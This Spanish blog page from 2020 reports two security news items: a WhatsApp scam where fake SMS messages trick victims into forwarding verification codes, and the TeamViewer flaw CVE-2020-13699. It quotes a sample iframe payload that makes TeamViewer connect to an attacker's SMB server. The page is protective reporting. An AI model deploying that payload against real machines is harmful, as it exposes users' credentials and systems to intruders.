jueves, 13 de agosto de 2020

SMS de WhatsApp: nuevo ataque para robar cuentas


Las estafas de WhatsApp están a la orden del día. Es raro el mes donde no se descubre una nueva, y donde muchos usuarios acaban cayendo en las cada vez más ingeniosas formas de robar una cuenta. Ahora, la última se hace pasar por la propia WhatsApp para robarte toda tu cuenta, tus conversaciones y tus fotos.

Así lo ha alertado Panda Security, que ha descubierto un nuevo ataque en el que se envía un mensaje SMS en primera instancia a la víctima. Ese mensaje, en el que el atacante se hace pasar por WhatsApp, indica que “recientemente alguien ha registrado una cuenta de WhatsApp con ese número”, siendo éste el de la víctima. Para comprobar que la persona que recibe el SMS es la propietaria de la cuenta, los criminales piden que reenvíe el código que va a recibir por medio de SMS.

No podrás recuperar el control de la cuenta


El problema es que ese código recibido por SMS lo han generado los atacantes intentando loguearse en tu cuenta de WhatsApp usando tu número en otro teléfono móvil. Si les das la clave que te llega por SMS, entonces la introducen en el nuevo móvil y pasan a robar tu cuenta de WhatsApp, bloqueándose así en tu móvil y perdiendo para siempre el acceso a ella.

whatsapp sms estafa


Con ello, los atacantes pueden pasar a utilizar tu lista de contactos para contactarles haciéndose pasar por ti. Posteriormente, pasan a realizar el mismo ataque a esos usuarios para ir tomando el control de sus cuentas mediante el envío del SMS falso. El sistema utilizado es bastante inteligente, porque aprovecha las propias medidas de seguridad que WhatsApp utiliza para evitar el robo de cuentas. Sin embargo, es importante tener en cuenta que WhatsApp nunca te va a contactar para enviarte un código que tu no has solicitado. Y lo más importante es que nadie más, excepto tú, tenga ese código, ya que con él y tu número de teléfono te pueden robar la cuenta.

Nunca reenvíes el código del SMS de WhatsApp


Al realizar WhatsApp copias de seguridad de nuestros mensajes, tenemos la “suerte” de que éstos al menos no se pierden, y nos veremos obligados a crear una cuenta nueva, lo cual puede confundir a nuestros contactos y generarnos más de un problema.

Este tipo de ataques pueden ser llevados a cabo por cualquier persona sin que haga falta tener conocimientos técnicos de hackeo o vulnerabilidades, ya que se basa en ingeniería social que se aprovecha de la ingenuidad y desconocimiento de muchos usuarios. Por ello, la única forma de protegerse es no darle a nadie los códigos que recibamos por SMS.

Fuente º-º https://SOCIEDAD.vip

Una vulnerabilidad en TeamViewer permite intrusos sin contraseña


Son muchas las herramientas que tenemos para conectarnos de forma remota a otro equipo. En los tiempos en los que vivimos esto es algo muy habitual y a lo que recurren muchos usuarios. Si hablamos de un programa muy popular ese es TeamViewer. En este artículo nos hacemos eco de un problema que afecta a este software y que pone en riesgo a los usuarios que lo utilizan. Este fallo permitiría a un atacante acceder a un ordenador.

Un fallo en TeamViewer permite el acceso de intrusos


Como decimos, TeamViewer es una importante herramienta que permite el acceso remoto a equipos en la red. TeamViewer cuenta con una vulnerabilidad que pone en riesgo la seguridad de los usuarios. Permitiría que un posible intruso accediera a ese ordenador sin dejar rastro y poder llevar a cabo diferentes tipos de ataques.

Es una realidad que en muchas ocasiones surgen fallos de seguridad que afectan a todo tipo de software que utilizamos en nuestro día a día. Pueden comprometer nuestra privacidad y poner en riesgo los dispositivos. Estas vulnerabilidades generalmente reciben actualizaciones por parte de los desarrolladores. Eso es lo que ha ocurrido en este caso.

Desde TeamViewer se han apresurado en lanzar un parche para corregir este importante fallo. La vulnerabilidad ha sido registrada como CVE-2020-13699 y ha sido calificada de alta gravedad.

Para ejecutar un ataque, un usuario necesitaría navegar a una página maliciosa que carga un iframe en el navegador web, posiblemente oculto o tan pequeño como un píxel, para evitar ser visto por un intruso. El iframe se carga a sí mismo usando el esquema de URI «teamviewer10:», que le dice al navegador que inicie la aplicación TeamViewer instalada en el equipo.

Estos esquemas de URI personalizados son utilizados por aplicaciones instaladas localmente que permiten al usuario iniciarlos desde su navegador. Por ejemplo, las URL que comienzan con «skype:» en el navegador iniciarían Skype. Otras aplicaciones de uso común como Slack, Zoom y Spotify usan estructuras de URI similares.


Lo que haría el atacante para aprovechar esta vulnerabilidad de TeamViewer, es establecer el atributo src del iframe en ‘teamviewer10: –play attacker-IP share fake.tvs’. Este comando lo que hace es que la aplicación de TeamViewer que esté instalada se conecte al servidor del atacante a través del protocolo SMB.

Acceder sin necesidad de contraseña


Hay que tener en cuenta también que un posible atacante no necesitaría conocer la contraseña del usuario. Podrían ser autenticados de forma automática y lograr así acceso.

Desde TeamViewer indicaron que este problema afectaba a varias versiones de esta herramienta para Windows. Concretamente afecta a las versiones 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 y 15.8.3. Sin embargo ya han lanzado el parche para todas ellas.

Recomendamos actualizar a la última versión. Esto es algo que debemos aplicar siempre en todo tipo de software que utilicemos. Puedes revisar el anuncio en el canal oficial de TeamViewer donde hacen mención a que el problema ya está solucionado.

Fuente º-º https://SOCIEDAD.vip

▲ Pulse la imagen para detalles del envío

Puede Donar a la Direccion Bitcoin: [[address]]

Monto de [[value]] BTC Recibido. Gracias.
[[error]]